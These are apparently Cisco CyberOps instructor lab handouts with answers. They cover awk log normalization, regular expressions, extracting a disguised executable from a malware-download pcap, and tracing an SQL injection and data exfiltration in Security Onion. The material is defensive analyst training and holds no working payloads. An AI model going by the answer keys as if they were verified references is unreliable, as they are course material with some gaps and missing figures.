Explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Yes, the script converted from Epoch to Human Readable. The script changed only the timestamp field,
preserving the rest of the file.
Compare the contents of the file and the printed output. Why is there the line, ||Wed 31 Dec 1969
07:00:00 PM EST?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The reason for the extra line is because the file has an empty line at the end, which led the script to
mistakenly interpret it as 0 and convert that into a Human Readable timestamp.
By interpreting the empty line as 0, the script converted 0 Unix Epoch to Human Readable. 0 Unix Epoch
translates to 0 seconds after midnight of Jan 1st, 1970. The script displays “Wed 31 Dec 1969 07:00:00
PM EST” because it automatically adjusts for the timezone. Because the CyberOps Workstation is
configured for EST (UTC -5), the script displays the midnight, Jan 1st 1970 minus 5 hours.

d. Use nano (or your favorite text editor) to remove the extra empty line at the end of the file and run the
AWK script again.
[analyst@secOps lab.support.files]$ nano applicationX_in_epoch.log
Is the output correct now? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Yes. Because the empty line was removed, no extra data was created and added to the log file by the
script.
e. While printing the result on the screen is useful for troubleshooting the script, analysts will likely need to
save the output in a text file. Redirect the output of the script above to a file named
applicationX_in_human.log to save it to a file:
[analyst@secOps lab.support.files]$ awk 'BEGIN
{FS=OFS="|"}{$3=strftime("%c",$3)} {print}' applicationX_in_epoch.log >
applicationX_in_human.log
[analyst@secOps lab.support.files]$
What was printed by the command above? Is this expected?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Nothing was printed on the screen. Yes, it is expected, as the command output was redirected to a text
file named applicationX_in_human.log.
f. Use cat to view the applicationX_in_human.log. Notice that the extra line is now removed and the
timestamps for the log entries have been converted to human readable format.
[analyst@secOps lab.support.files]$ cat applicationX_in_human.log
2|Z|Mon 18 Aug 2008 11:00:00 AM EDT|AF|0
3|N|Tue 19 Aug 2008 11:00:00 AM EDT|AF|89
4|N|Sun 07 Sep 2008 11:00:00 AM EDT|AS|12
1|Z|Mon 08 Sep 2008 11:00:00 AM EDT|AS|67
5|N|Tue 09 Sep 2008 11:00:00 AM EDT|EU|23
6|R|Wed 10 Sep 2008 11:00:00 AM EDT|OC|89
[analyst@secOps lab.support.files]$

Part 2: Normalize Timestamps in an Apache Log File

Similar to what was done with the applicationX_in_epoch.log file, Apache log files can also be normalized.
Follow the steps below to convert Unix Epoch to Human Readable timestamps. Consider the following
Apache log file, apache_in_epoch.log:
[analyst@secOps lab.support.files]$ cat apache_in_epoch.log
198.51.100.213 - - [1219071600] "GET
/twiki/bin/edit/Main/Double_bounce_sender?topicparent=Main.ConfigurationVariables
HTTP/1.1" 401 12846
198.51.100.213 - - [1219158000] "GET
/twiki/bin/rdiff/TWiki/NewUserTemplate?rev1=1.3&rev2=1.2 HTTP/1.1" 200 4523
198.51.100.213 - - [1220799600] "GET /mailman/listinfo/hsdivision HTTP/1.1" 200 6291

198.51.100.213 - - [1220886000] "GET /twiki/bin/view/TWiki/WikiSyntax HTTP/1.1" 200

7352
198.51.100.213 - - [1220972400] "GET /twiki/bin/view/Main/DCCAndPostFix HTTP/1.1" 200
5253
198.51.100.213 - - [1221058800] "GET
/twiki/bin/oops/TWiki/AppendixFileSystem?template=oopsmore&m1=1.12&m2=1.12 HTTP/1.1"
200 11382
The Apache Log file above contains six entries which record events related to the Apache web server.
Each entry has seven fields. The fields are delimited by a space:
o The first column contains the IPv4 address, 198.51.100.213, of the web client placing the request.
o The second and third columns are not used and a “-“ character is used to represent no value.
o The fourth column contains the timestamp in Unix Epoch time, for example [1219071600].
o The fifth column contains text with details about the event, including URLs and web request
parameters. All six entries are HTTP GET messages. Because these messages include spaces, the
entire field is enclosed with quotes.
o The sixth column contains the HTTP status code, for example 401.
o The seventh column contains the size of the response to the client (in bytes), for example 12846.
Similar to part one, a script will be created to convert the timestamp from Epoch to Human Readable.
a. First, answer the questions below. They are crucial for the construction of the script.
In the context of timestamp conversion, what character would work as a good delimiter character for the
Apache log file above?
____________________________________________________________________________________
The space character.
How many columns does the Apache log file above contain?
____________________________________________________________________________________
7
In the Apache log file above, what column contains the Unix Epoch Timestamp?
____________________________________________________________________________________
Column 4
b. In the CyberOps Workstation VM terminal, a copy of the Apache log file, apache_in_epoch.log, is stored
in the /home/analyst/lab.support.files.
c. Use an awk script to convert the timestamp field to a human readable format. Notice that the command
contains the same script used previously, but with a few adjustments for the timestamp field and file
name.
[analyst@secOps lab.support.files]$ awk 'BEGIN {FS=OFS="
"}{$4=strftime("%c",$4)} {print}'
/home/analyst/lab.support.files/apache_in_epoch.log
Was the script able to properly convert the timestamps? Describe the output.
____________________________________________________________________________________
No. All timestamps are now Wed 31 Dec 1969 07:00:00 PM EST.

d. Before moving forward, think about the output of the script. Can you guess what caused the incorrect
output? Is the script incorrect? What are the relevant differences between the
applicationX_in_epoch.log and apache_in_epoch.log?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The problem is the square brackets in the course file. The script expects the timestamp to be in the Unix
Epoch format which does not include the square brackets. Because the script does not know what
number represents the “[“ character, it assumes zero and returns the Unix beginning of time in UTC -5.
e. To fix the problem, the square brackets must be removed from the timestamp field before the conversion
takes place. Adjust the script by adding two actions before the conversion, as shown below:
[analyst@secOps lab.support.files]$ awk 'BEGIN {FS=OFS=" "}
{gsub(/\[|\]/,"",$4)}{print}{$4=strftime("%c",$4)}{print}'
apache_in_epoch.log
Notice after specifying space as the delimiter with {FS=OFS=” “}, there is a regular expression action to
match and replace the square brackets with an empty string, effectively removing the square brackets
that appear in the timestamp field. The second action prints the updated line so the conversion action can
be performed.
 gsub() – This is an internal AWK function used to locate and substitute strings. In the script
above, gsub() received three comma-separated parameters, described below.
 /\[|\]/ – This is a regular expression passed to gsub() as the first parameter. The regular
expression should be read as ‘find “[“ OR “]”’. Below is the breakdown of the expression:
o The first and last “/” character marks the beginning and end of the search block. Anything
between the first “/” and the second “/” are related to the search. The “\” character is used
to escape the following “[“. Escaping is necessary because “[“ can also be used by an
operator in regular expressions. By escaping the “[“ with a leading “\”, we tell the
interpreter that the “]” is part of the content and not an operator. The “|” character is the
OR operator. Notice that the “|” is not escaped and will therefore, be seen as an operator.
Lastly, the regular expression escapes the closing square bracket with “\]”, as done
before.
 "" – This represents no characters, or an empty string. This parameter tells gsub() what to
replace the “[“ and “]” with, when found. By replacing the “[“ and “]” with “”, gsub() effectively
removes the “[“ and “]” characters.
 $4 – This tells gsub() to work only on the fourth column of the current line, the timestamp column.
Note: Regular expression interpretation is a SECOPS exam topic. Regular expressions are covered in
more detail in another lab in this chapter. However, you may wish to search the Internet for tutorials.
f. In a CyberOps Workstation VM terminal, execute the adjusted script, as follows:
[analyst@secOps lab.support.files]$ awk 'BEGIN {FS=OFS="
"}{gsub(/\[|\]/,"",$4)}{print}{$4=strftime("%c",$4)}{print}'
apache_in_epoch.log
Was the script able to properly convert the timestamps this time? Describe the output.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________

Yes. The output now displays two lines for each log entry. The first line displays the timestamp in Unix
Epoch format and the second line is the same log entry with the timestamp displayed using Human
Readable format.

Part 3: Log File Preparation in Security Onion

Because log file normalization is important, log analysis tools often include log normalization features. Tools
that do not include such features often rely on plugins for log normalization and preparation. The goal of these
plugins is to allow log analysis tools to normalize and prepare the received log files for tool consumption.
The Security Onion appliance relies on a number of tools to provide log analysis services. ELSA, Bro, Snort
and SGUIL are arguably the most used tools.
ELSA (Enterprise Log Search and Archive) is a solution to achieve the following:
 Normalize, store, and index logs at unlimited volumes and rates.
 Provide a simple and clean search interface and API.
 Provide an infrastructure for alerting, reporting and sharing logs.
 Control user actions with local or LDAP/AD-based permissions.
 Plugin system for taking actions with logs.
 Exist as a completely free and open-source project.
Bro is a framework designed to analyze network traffic and generate event logs based on it. Upon network
traffic analysis, Bro creates logs describing events such as the following:
 TCP/UDP/ICMP network connections
 DNS activity
 FTP activity
 HTTPS requests and replies
 SSL/TLS handshakes
Snort and SGUIL
Snort is an IDS that relies on pre-defined rules to flag potentially harmful traffic. Snort looks into all portions of
network packets (headers and payload), looking for patterns defined in its rules. When found, Snort takes the
action defined in the same rule.
SGUIL provides a graphical interface for Snort logs and alerts, allowing a security analyst to pivot from SGUIL
into other tools for more information. For example, if a potentially malicious packet is sent to the organization
web server and Snort raised an alert about it, SGUIL will list that alert. The analyst can then right-click that
alert to search the ELSA or Bro databases for a better understanding of the event.
Note: The directory listing maybe different than the sample output shown below.

Step 1: Switch to Security Onion.

Launch the Security Onion VM from VirtualBox’s Dashboard (username: analyst / password: cyberops).
The CyberOps Workstation VM can be closed to free up memory in the host computer for this part of the lab

Step 2: ELSA Logs

a. Open a terminal window in the Security Onion VM. You can access to the applications menu is shown in
the following screenshot:

b. You can also right-click the Desktop > Open Terminal Here, as show in the following screenshot:

c. ELSA logs can be found under the /nsm/elsa/data/elsa/log/ directory. Change the directory using the
following command:
analyst@SecOnion:~/Desktop$ cd /nsm/elsa/data/elsa/log
analyst@SecOnion:/nsm/elsa/data/elsa/log$
d. Use the ls –l command to list the files:
analyst@SecOnion:/nsm/elsa/data/elsa/log$ ls -l
total 99112
total 169528
-rw-rw---- 1 www-data sphinxsearch 56629174 Aug 18 14:15 node.log
-rw-rw---- 1 www-data sphinxsearch 6547557 Aug 3 07:34 node.log.1.gz
-rw-rw---- 1 www-data sphinxsearch 7014600 Jul 17 07:34 node.log.2.gz
-rw-rw---- 1 www-data sphinxsearch 6102122 Jul 13 07:34 node.log.3.gz
-rw-rw---- 1 www-data sphinxsearch 4655874 Jul 8 07:35 node.log.4.gz
-rw-rw---- 1 www-data sphinxsearch 6523029 Aug 18 14:15 query.log
-rw-rw---- 1 www-data sphinxsearch 53479942 Aug 18 14:15 searchd.log

-rw-rw---- 1 www-data sphinxsearch 32613665 Aug 18 14:15 web.log

analyst@SecOnion:/nsm/elsa/data/elsa/log$

Step 3: Bro Logs in Security Onion

a. Bro logs are stored at /nsm/bro/logs/. As usual with Linux systems, log files are rotated based on the
date, renamed and stored on the disk. The current log files can be found under the current directory.
From the terminal window, change directory using the following command.
analyst@SecOnion:/nsm/elsa/data/elsa/log$ cd /nsm/bro/logs/current
analyst@SecOnion:/nsm/logs/current$
b. Use the ls -l command to see all the log files generated by Bro:
analyst@SecOnion:/nsm/bro/logs/current$ ls -l
total 100
-rw-rw-r-- 1 sguil sguil 368 Aug 18 14:02 capture_loss.log
-rw-rw-r-- 1 sguil sguil 46031 Aug 18 14:16 communication.log
-rw-rw-r-- 1 sguil sguil 2133 Aug 18 14:03 conn.log
-rw-rw-r-- 1 sguil sguil 2028 Aug 18 14:16 stats.log
-rw-rw-r-- 1 sguil sguil 40 Aug 18 14:00 stderr.log
-rw-rw-r-- 1 sguil sguil 188 Aug 18 13:46 stdout.log
analyst@SecOnion:/nsm/bro/logs/current$

Step 4: Snort Logs

a. Snort logs can be found at /nsm/sensor_data/. Change directory as follows.
analyst@SecOnion:/nsm/bro/logs/current$ cd /nsm/sensor_data
analyst@SecOnion:/nsm/sensor_data$
b. Use the ls -l command to see all the log files generated by Snort.
analyst@SecOnion:/nsm/sensor_data$ ls -l
total 16
drwxrwxr-x 7 sguil sguil 4096 Jun 19 23:16 seconion-eth0
drwxrwxr-x 7 sguil sguil 4096 Jun 19 23:16 seconion-eth1
drwxrwxr-x 7 sguil sguil 4096 Jun 19 23:16 seconion-eth2
drwxrwxr-x 5 sguil sguil 4096 Jun 19 23:08 seconion-eth3
analyst@SecOnion:/nsm/sensor_data$
c. Notice that Security Onion separates files based on the interface. Because the Security Onion VM
image has four interfaces, four directories are kept. Use the ls –l seconion-eth0 command to see the
files generated by the ethernet 0 interface.
analyst@SecOnion:/nsm/sensor_data$ ls -l seconion-eth0/
total 52
drwxrwxr-x 2 sguil sguil 4096 Jun 19 23:09 argus
drwxrwxr-x 10 sguil sguil 4096 Jul 7 12:09 dailylogs
drwxrwxr-x 2 sguil sguil 4096 Jun 19 23:08 portscans
drwxrwxr-x 2 sguil sguil 4096 Jun 19 23:08 sancp
drwxr-xr-x 2 sguil sguil 4096 Jul 7 12:12 snort-1
-rw-r--r-- 1 sguil sguil 27566 Jul 7 12:12 snort-1.stats
-rw-r--r-- 1 root root 0 Jun 19 23:08 snort.stats
analyst@SecOnion:/nsm/sensor_data$

Step 5: Various Logs

a. While the /nsm/ directory stores some logs files, more specific log files can be found under /var/log/nsm/.
Change directory and use the ls -l command to see all the log files in the directory.
analyst@SecOnion:/nsm/sensor_data$ cd /var/log/nsm/
analyst@SecOnion:/var/log/nsm$ ls -l
total 8364
-rw-r--r-- 1 sguil sguil 4 Aug 18 14:56 eth0-packets.log
-rw-r--r-- 1 sguil sguil 4 Aug 18 14:56 eth1-packets.log
-rw-r--r-- 1 sguil sguil 4 Aug 18 14:56 eth2-packets.log
-rw-r--r-- 1 sguil sguil 182 Aug 18 13:46 ossec_agent.log
-rw-r--r-- 1 sguil sguil 202 Jul 11 12:02 ossec_agent.log.20170711120202
-rw-r--r-- 1 sguil sguil 202 Jul 13 12:02 ossec_agent.log.20170713120201
-rw-r--r-- 1 sguil sguil 202 Jul 14 12:02 ossec_agent.log.20170714120201
-rw-r--r-- 1 sguil sguil 202 Jul 15 12:02 ossec_agent.log.20170715120202
-rw-r--r-- 1 sguil sguil 249 Jul 16 12:02 ossec_agent.log.20170716120201
-rw-r--r-- 1 sguil sguil 202 Jul 17 12:02 ossec_agent.log.20170717120202
-rw-r--r-- 1 sguil sguil 202 Jul 28 12:02 ossec_agent.log.20170728120202
-rw-r--r-- 1 sguil sguil 202 Aug 2 12:02 ossec_agent.log.20170802120201
-rw-r--r-- 1 sguil sguil 202 Aug 3 12:02 ossec_agent.log.20170803120202
-rw-r--r-- 1 sguil sguil 202 Aug 4 12:02 ossec_agent.log.20170804120201
-rw-r--r-- 1 sguil sguil 42002 Aug 4 07:33 pulledpork.log
drwxr-xr-x 2 sguil sguil 4096 Aug 18 13:46 seconion-eth0
drwxr-xr-x 2 sguil sguil 4096 Aug 18 13:47 seconion-eth1
drwxr-xr-x 2 sguil sguil 4096 Aug 18 13:47 seconion-eth2
drwxr-xr-x 2 sguil sguil 4096 Jun 19 23:08 securityonion
-rw-r--r-- 1 sguil sguil 1647 Jun 19 23:09 securityonion-elsa-config.log
-rw-r--r-- 1 sguil sguil 7708106 Aug 18 14:56 sensor-clean.log
-rw-r--r-- 1 sguil sguil 1603 Aug 4 00:00 sensor-newday-argus.log
-rw-r--r-- 1 sguil sguil 1603 Aug 4 00:00 sensor-newday-http-agent.log
-rw-r--r-- 1 sguil sguil 8875 Aug 4 00:00 sensor-newday-pcap.log
-rw-r--r-- 1 sguil sguil 53163 Aug 4 05:01 sguil-db-purge.log
-rw-r--r-- 1 sguil sguil 369738 Aug 4 07:33 sid_changes.log
-rw-r--r-- 1 sguil sguil 22598 Aug 8 01:35 so-bro-cron.log
drwxrwxr-x 2 sguil securityonion 4096 Jun 19 23:09 so-elsa
-rw------- 1 sguil sguil 7535 Jun 19 23:09 sosetup.log
-rw-r--r-- 1 sguil sguil 14046 Jun 19 23:09 sosetup_salt_call.log
-rw-r--r-- 1 sguil sguil 63208 Jun 19 23:09 sphinx_initialization.log
-rw-r--r-- 1 sguil sguil 81 Aug 18 14:55 squert-ip2c-5min.log
-rw-r--r-- 1 sguil sguil 1079 Jul 16 06:26 squert-ip2c.log
-rw-r--r-- 1 sguil sguil 125964 Aug 18 14:54 watchdog.log
analyst@SecOnion:/var/log/nsm$
Notice that the directory shown above also contains logs used by secondary tools such as OSSEC,
Pulledpork, Sphinx, and Squert.
b. Take some time to Google these secondary tools and answer the questions below:

For each one of the tools listed above, describe the function, importance, and placement in the security
analyst workflow.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Sphinx is an open source search engine and is used by ELSA to provide search capabilities.
Pulledpork is a Snort rule manage system. It facilitates Snort rules updating. Outdated Snort rules makes
the entire system useless.
OSSEC is a system used to normalize and concentrate local system logs. When deployed throughout the
organization, OSSEC allows an analyst to have a clear picture of what is happening in the systems.
Squert is a visual tool that attempts to provide additional context to events through the use of metadata,
time series representations, and weighted and logically grouped result sets.

Part 4: Reflection
Log normalization is important and depends on the deployed environment.
Popular tools include their own normalization features, but log normalization can also be done manually.
When manually normalizing and preparing log files, double-check scripts to ensure the desired result is
achieved. A poorly written normalization script may modify the data, directly impacting the analyst’s work.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 12 of 12 www.netacad.com
Lab – Regular Expression Tutorial (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will learn how to use regular expressions to search for desired strings of information.

Background / Scenario
A regular expression (regex) is a pattern of symbols that describes data to be matched in a query or other
operation. Regular expressions are constructed similarly to arithmetic expressions, by using various operators
to combine smaller expressions. There are two major standards of regular expression, POSIX and Perl.
In this lab, you will use an online tutorial to explore regular expressions. You will also describe the information
that matches given regular expressions.

Required Resources
 CyberOps Workstation VM
 Internet connection

Step 1: Complete the regexone.com tutorial.

a. Open a web browser and navigate to https://regexone.com/ from your host computer. Regex One is a
tutorial that provides you with lessons to learn about regular expression patterns.

b. After you have finished with the tutorial, record the function of some of the metacharacters that are used
in regular expressions.

Metacharacters Description

$ Matches the ending position within the string

* Matches zero or more times for the preceding item

. Any single character

[ ] any single character in the list

\. Period

\d Any digit character

\D Any non-digit character

^ Matches the starting position within the string

{m} matches m number of repetitions

{n,m} at least n number of repetitions, but not more than m times

$ Matches the ending position within the string

* Matches zero or more times for the preceding item

abc|123 Matches any string matching either expression: 123, abc

Step 2: Describe the provided regular expression pattern.

Regex pattern Description

^83 Any string that begins with the number 83

[A-Z]{2,4} Any string that contains 2 to 4 capital letters consecutively
2015 Any string that contains the number 2015
05:22:2[0-9] Any string that contains 05:22:20 to 05:22:29
\.com Any string that contains .com
complete|GET Any string that matches complete or GET
0{4} Any string that contains 4 zeros consecutively

Step 3: Verify your answers.

In this step, you will verify your answers in the previous step using a text file stored in the CyberOps
Workstation VM.
a. Launch and log in to the CyberOps Workstation VM (username: analyst / password: cyberops).
b. Open a terminal and navigate to the following folder:
[analyst@secOps ~]$ cd lab.support.files/

c. Use the less command to open the logstash-tutorial.log file.

[analyst@secOps lab.support.files]$ less logstash-tutorial.log
d. At the bottom of the screen, you will see logstash-tutorial.log: highlighted. This is the cursor at which
you will enter the regular expression. Precede the regular expression with a forward slash (/). For
example, the first pattern in the above table is ^83. Enter /^83.

The matching text from the log file is highlighted. Use the scroll wheel on the mouse or use the j or k keys
on your keyboard to locate the highlighted patterns.
e. For the next expression, enter /[A-Z]{2,4} at the colon (:) prompt.
Note: The colon is replaced by / as you type the expression.
f. Enter the rest of the regular expressions from the table in Step 2. Make sure all the expressions are
preceded with a forward slash (/). Continue until you have verified your answers. Press q to exit the
logstash-tutorial.log file.
g. Close the terminal and shut down the VM.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 3 www.netacad.com
Lab – Extract an Executable from a PCAP (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Prepare the Virtual Environment
Part 2: Analyze Pre-Captured Logs and Traffic Captures

Background / Scenario
Looking at logs is very important but it is also important to understand how network transactions happen at
the packet level.
In this lab, you will analyze the traffic in a previously captured pcap file and extract an executable from the file.

Required Resources
 CyberOps Workstation VM
 Internet connection

Part 1: Prepare the Virtual Environment

a. Launch Oracle VirtualBox. Right-click CyberOps Workstion > Settings > Network. Besides Attached To,
select Bridged Adapter, if necessary, and click OK.
b. Log in to the CyberOps Workstation VM (username: analyst / password: cyberops), open a terminal, and
run the configure_as_dhcp.sh script.
[analyst@secOps ~]$ sudo ./lab.support.files/scripts/configure_as_dhcp.sh
[sudo] password for analyst:
[analyst@secOps ~]$

Part 2: Analyze Pre-Captured Logs and Traffic Captures

In Part 2, you will work with the nimda.download.pcap file. Captured in a previous lab,
nimda.download.pcap contains the packets related to the download of the Nimda malware. Your version of
the file, if you created it in the previous lab and did not reimport your CyberOps Workstation VM, is stored in
the /home/analyst directory. However, a copy of that file is also stored in the CyberOps Workstation VM,
under the /home/analyst/lab.support.files/pcaps directory so that you can complete this lab regardless of
whether you completed the previous lab or not. For consistency of output, the lab will use the stored version
in the pcaps directory.
While tcpdump can be used to analyze captured files, Wireshark’s graphical interface makes the task much
easier. It is also important to note that tcpdump and Wireshark share the same file format for packet
captures; therefore, PCAP files created by one tool can be opened by the other.
a. Change directory to the lab.support.files/pcaps folder, and get a listing of files using the ls –l command.
[analyst@secOps ~]$ cd lab.support.files/pcaps
[analyst@secOps pcaps]$ ls -l
total 7460
-rw-r--r-- 1 analyst analyst 3510551 Aug 7 15:25 lab_prep.pcap

-rw-r--r-- 1 analyst analyst 371462 Jun 22 10:47 nimda.download.pcap

-rw-r--r-- 1 analyst analyst 3750153 May 25 11:10 wannacry_download_pcap.pcap
[analyst@secOps pcaps]$
b. Issue the command below to open the nimda.download.pcap file in Wireshark.
[analyst@secOps pcaps]$ wireshark-gtk nimda.download.pcap
c. The nimda.download.pcap file contains the packet capture related to the malware download performed
in a previous lab. The pcap contains all the packets sent and received while tcpdump was running.
Select the fourth packet in the capture and expand the Hypertext Transfer Protocol to display as shown
below.

d. Packets one through three are the TCP handshake. The fourth packet shows the request for the malware
file. Confirming what was already known, the request was done over HTTP, sent as a GET request.

e. Because HTTP runs over TCP, it is possible to use Wireshark’s Follow TCP Stream feature to rebuild
the TCP transaction. Select the first TCP packet in the capture, a SYN packet. Right-click it and choose
Follow TCP Stream.

f. Wireshark displays another window containing the details for the entire selected TCP flow.

What are all those symbols shown in the Follow TCP Stream window? Are they connection noise? Data?
Explain.
____________________________________________________________________________________
____________________________________________________________________________________
The symbols are the actual contents of the downloaded file. Because it is binary file, Wireshark does not
know how to represent it. The displayed symbols are Wireshark’s best guess at making sense of the
binary data while decoding it as text.
There are a few readable words spread among the symbols. Why are they there?
____________________________________________________________________________________
____________________________________________________________________________________

Those are strings contained in the executable code. Usually, these words are part of messages provided
by the program to the user while it runs. While more of an art than a science, a skilled analyst can extract
valuable information by reading through these fragments.
Challenge Question: Despite the W32.Nimda.Amm.exe name, this executable is not the famous worm.
For security reasons, this is another executable file that was renamed as W32.Nimda.Amm.exe. Using
the word fragments displayed by Wireshark’s Follow TCP Stream window, can you tell what executable
this really is?
____________________________________________________________________________________
____________________________________________________________________________________
Scrolling all the way down on that window reveals that this is the Microsoft Windows cmd.exe file.
g. Click Close in the Follow TCP Stream window to return to the Wireshark nimda.download.pcap file.

Part 3: Extract Downloaded Files From PCAPS

Because capture files contain all packets related to traffic, a PCAP of a download can be used to retrieve a
previously downloaded file. Follow the steps below to use Wireshark to retrieve the Nimda malware.

a. In that fourth packet in the nimda.download.pcap file, notice that the HTTP GET request was generated
from 209.165.200.235 to 209.165.202.133. The Info column also shows this is in fact the GET request for
the file.

b. With the GET request packet selected, navigate to File > Export Objects > HTTP, from Wireshark’s
menu.

c. Wireshark will display all HTTP objects present in the TCP flow that contains the GET request. In this
case, only the W32.Nimda.Amm.exe file is present in the capture. It will take a few seconds before the
file is displayed.

Why is W32.Nimda.Amm.exe the only file in the capture?

d. In the HTTP object list window, select the W32.Nimda.Amm.exe file and click Save As at the bottom of
the screen.
e. Click the left arrow until you see the Home button. Click Home and then click the analyst folder (not the
analyst tab). Save the file there.
f. Return to your terminal window and ensure the file was saved. Change directory to the /home/analyst
folder and list the files in the folder using the ls -l command.
[analyst@secOps pcaps]$ cd /home/analyst
[analyst@secOps ~]$ ls –l
total 364
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 May 25 11:16 Downloads
drwxr-xr-x 2 analyst analyst 4096 May 22 08:39 extra
drwxr-xr-x 8 analyst analyst 4096 Jun 22 11:38 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 345088 Jun 22 15:12 W32.Nimda.Amm.exe
[analyst@secOps ~]$
Was the file saved? ____________________________________ Yes
g. The file command gives information on the file type. Use the file command to learn a little more about the
malware, as show below:
[analyst@secOps ~]$ file W32.Nimda.Amm.exe
W32.Nimda.Amm.exe: PE32+ executable (console) x86-64, for MS Windows
[analyst@secOps ~]$
As seen above, W32.Nimda.Amm.exe is indeed a Windows executable file.
In the malware analysis process, what would be a probable next step for a security analyst?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The goal is to identify the type of malware and analyze its behavior. Therefore, the malware file should be
moved to a controlled environment and execute it to watch its behavior. Malware analysis environments
often rely on virtual machines and are sandboxed to avoid damage to non-test systems. Such
environments usually contain tools that facilitate monitoring of the malware execution; resources usage,
network connections and operating system changes are common monitored aspects.
There are also a few Internet-based malware analysis tools. VirusTotal (virustotal.com) is one example.
Analysts upload malware to VirusTotal, which in turn, executes the malicious code. After execution and a
number of other checks, VirusTotal returns a report to the analyst.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 9 www.netacad.com
Lab – Interpret HTTP and DNS Data to Isolate Threat Actor
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will review logs during an exploitation of documented HTTP and DNS vulnerabilities.
Part 1: Prepare the Virtual Environment
Part 2: Investigate an SQL Injection Attack
Part 3: Analyzing an Data Exfiltration

Background / Scenario
MySQL is a relational database management system (RDBMS) that uses the structured query language
(SQL) to add, access, and manage content in a database. MySQL is a popular RDBMS used by numerous
web applications. Unfortunately, a web hacking technique called SQL injection can be used by an attacker to
execute malicious SQL statements in an attempt to control a web application's database server.
Domain name servers (DNS) are directories of domain names, and they translate the domain names into IP
addresses. This service can be used to exfiltrate data.
In this lab, you will investigate a possible SQL injection to access the SQL database on the server. You will
also review the logs to investigate a possible data exfiltration and the method of exfiltration.

Required Resources
 Host computer with at least 3 GB of RAM and 10 GB of free disk space
 Latest version of Oracle VirtualBox
 Internet connection
 One virtual machine: Alternate Security Onion VM

Part 1: Prepare the Virtual Environment

a. Download the Alternate Security Onion virtual machine.
b. Launch Oracle VirtualBox. Import the Alternate Security Onion VM.
c. Launch and log into Alternate Security Onion VM. Log in with the user analyst and password cyberops.
d. In the Alternate Security Onion VM, right-click the Desktop > Open Terminal Here. Enter the sudo
service nsm status command to verify that all the servers and sensors are ready. This process could
take a few moments. If some services report FAIL, repeat the command as necessary until all the
statuses are OK before moving on to the next part.
analyst@SecOnion:~/Desktop$ sudo service nsm status
Status: securityonion
* sguil server [ OK ]
Status: HIDS
* ossec_agent (sguil) [ OK ]
Status: Bro

Name Type Host Status Pid Started

manager manager localhost running 5577 26 Jun 10:04:27
proxy proxy localhost running 5772 26 Jun 10:04:29
seconion-eth0-1 worker localhost running 6245 26 Jun 10:04:33
seconion-eth1-1 worker localhost running 6247 26 Jun 10:04:33
seconion-eth2-1 worker localhost running 6246 26 Jun 10:04:33
Status: seconion-eth0
* netsniff-ng (full packet data) [ OK ]
* pcap_agent (sguil) [ OK ]
* snort_agent-1 (sguil) [ OK ]
* snort-1 (alert data) [ OK ]
* barnyard2-1 (spooler, unified2 format) [ OK ]
<output omitted>

Part 2: Investigate an SQL Injection Attack

As you reviewed the Sguil log, you noticed that there is a possible SQL injection attack. You will investigate
the events to determine the extent of the possible exploitation.

Step 1: Review the Sguil logs.

a. Navigate to the Alternate Security Onion VM. Double-click the Sguil icon on the Desktop. Enter the
username analyst and password cyberops when prompted.
b. Click Select All to monitor all the networks. Click Start SGUIL to continue.
c. In the bottom-right window of the Sguil console, click Show Packet Data and Show Rule to view the
details of a selected alert.

d. Search for alerts related to ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT.
Select the alerts that start with 5. These alerts are related to seconion-eth1-1, and they are probably the
most recent alerts. Select the alert with ID 5.5836.

e. Right-click the number under the CNT heading for the selected alert to view all the related alerts. Select
View Correlated Events.

f. Right-click an Alert ID in the results. Select Transcript to view the details for this alert.

What information can you gather from the Transcript window?

Compare the credit card information from the transcript window and the content extracted by the SQL
injection attack. What is your conclusion?
____________________________________________________________________________________
The credit card information is the same because the transcript shows all the content transmitted between
the source and destination.
i. Close the windows when finished.

j. Return to the Sguil window, right-click the same Alert ID that contains the exfiltrated credit card
information and select Wireshark.

k. Right-click a TCP packet and select Follow TCP Stream.

l. The GET request and the exfiltrated data are displayed in the TCP stream window. Your output may be
different than the figure below, but it should contain the same credit card information as your transcript
above.

m. At this time, you could save the Wireshark data by clicking Save As in the TCP stream window.
Alternatively, you can also save the Wireshark pcap file. You can also document the source and

destination IP addresses and ports, time of incident, and protocol used for further analysis by a Tier 2
analyst.
n. Close or minimize Wireshark and Squil.

Step 2: Review the ELSA logs.

The ELSA logs can also provide similar information.
a. While in the Security Onion VM, double-click to start ELSA from the Desktop. If you receive the following
"Your connection is not private" message, click ADVANCED to continue.

b. Click Proceed to localhost (unsafe) to continue to the localhost.

c. Log in with the username analyst and password cyberops. You will now perform a query looking for
HTTP SQL injection of the Sguil alert.
d. In the left panel, select HTTP > Top Potential SQL Injection.
e. Click in the From field and select 11/11/17 as the date. Click Submit Query. Select 209.165.200.235.

f. This opens detailed information of the alert. This information is related the successful SQL injection.
Notice the union query that was used during the attack. Click Info on the first entry.

g. Click Plugin > getPcap. Enter username analyst and password cyberops when prompted. Click Submit
if necessary. CapMe is a web interface that allows you to get a pcap transcript and download the pcap.

